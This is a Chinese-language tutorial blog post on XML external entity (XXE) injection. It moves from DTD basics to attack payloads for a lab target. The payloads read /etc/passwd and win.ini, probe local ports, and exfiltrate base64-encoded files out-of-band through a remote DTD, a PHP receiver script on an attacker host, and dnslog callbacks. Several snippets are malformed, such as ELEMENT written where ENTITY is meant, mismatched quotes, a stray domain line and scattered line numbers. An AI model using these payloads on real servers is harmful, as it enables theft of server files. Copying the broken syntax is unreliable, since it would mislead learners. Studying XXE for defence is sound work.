【网络安全】XXE--XML外部实体注入

XXE定义

XML外部实体注入（XML EXTERNAL ENTITY）简称XXE漏洞，概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

XML初识

菜鸟xml概念

初识DTD

<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend</body>
</note>
1
2
3
4
5
6
7
8
9
10
11
12
13
14

!DOCTYPE note (第二行)定义此文档是 note 类型的文档。
!ELEMENT note (第三行)定义 note 元素有四个元素：“to、from、heading,、body”
!ELEMENT to (第四行)定义 to 元素为 “#PCDATA” 类型
!ELEMENT from (第五行)定义 from 元素为 “#PCDATA” 类型
!ELEMENT heading (第六行)定义 heading 元素为 “#PCDATA” 类型
!ELEMENT body (第七行)定义 body 元素为 “#PCDATA” 类型

解答疑虑1：！DOCTYPE是干什么用的

疑虑2：！ELEMENT是干什么用的

疑虑3：#PCDATA是干什么用的

疑虑4：为什么元素要再次声明类型

内部实体和外部实体的区别

内部实体

<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright runoob.com">
1
2

实体可以理解为变量
writer = Donald Duck.
copyright = Copyright runoob.com


如何引用：
元素标签内+ &writer;
例子：<heading>&writer;</heading>

总结：就是在xml内部进行定义变量，就是所谓的内部实体
1
2
3
4
5
6
7
8
9
10

外部实体

<!ENTITY writer SYSTEM "http://www.runoob.com/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.runoob.com/entities.dtd">
1
2

理解为：
writer = "http://www.runoob.com/entities.dtd"
copyright = "http://www.runoob.com/entities.dtd"
SYSTEM 在引用外部实体的时候需要加SYSTEM

如何引用：
元素标签内+ &writer;
例子：<heading>&writer;</heading>

总结：外部实体就是引用外部的文件
1
2
3
4
5
6
7
8
9
10

通用实体引用

创建文件aaa.dtd
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright runoob.com">
1
2
3

引用方式：
<?xml version='1.1' encoding='utf-8'>
<!DOCTYPE note [
<!ELEMENT % file SYSTEM "http://www.runoob.com/aaa.dtd>"
%file;
]>
<note>
1
2
3
4
5
6
7

xxe漏洞利用

有回显

判断靶场是否存在回显

<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer "test">
]>
<name>&writer;</name>
1
2
3
4
5

利用file协议读取敏感信息

<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM 'file:///etc/passwd'>
]>
<name>&writer;</name>
1
2
3
4
5

win 请读取文件c:/windows/win.ini

探测端口

<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM '127.0.0.1:3306'>
]>
<name>&writer;</name>
1
2
3
4
5

无回显

利用http伪协议读取敏感信息

<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>
]>
<name>&writer;</name>
1
2
3
4
5

利用服务器攻击服务器漏洞获取敏感信息(待补充)

<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY % file SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>
5up4ga.dnslog.cn
<!ENTITY % remove SYSTEM 'http://192.168.0.22/home/kali/test/bbb.dtd'>
%remove; 
%all;
%send;
]>
<name>&writer;</name>
1
2
3
4
5
6
7
8
9
10

攻击方服务器启动目录准备php和dtd文件

<?
$file='./test.txt';
$content=base64_decode($_GET['file']);
file_put_contents($file,$content);
echo "\n";
?>
1
2
3
4
5
6

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://本地服务ip/php文件'？file=%file;'>"
>
1
2
3

利用dnslog平台检测是否访问

<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM 'http://qw1j8c.dnslog.cn'>
]>
<name>&writer;</name>
1
2
3
4
5

或

<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY % writer SYSTEM 'http://qw1j8c.dnslog.cn'>
%writer;
]>

1
2
3
4
5
6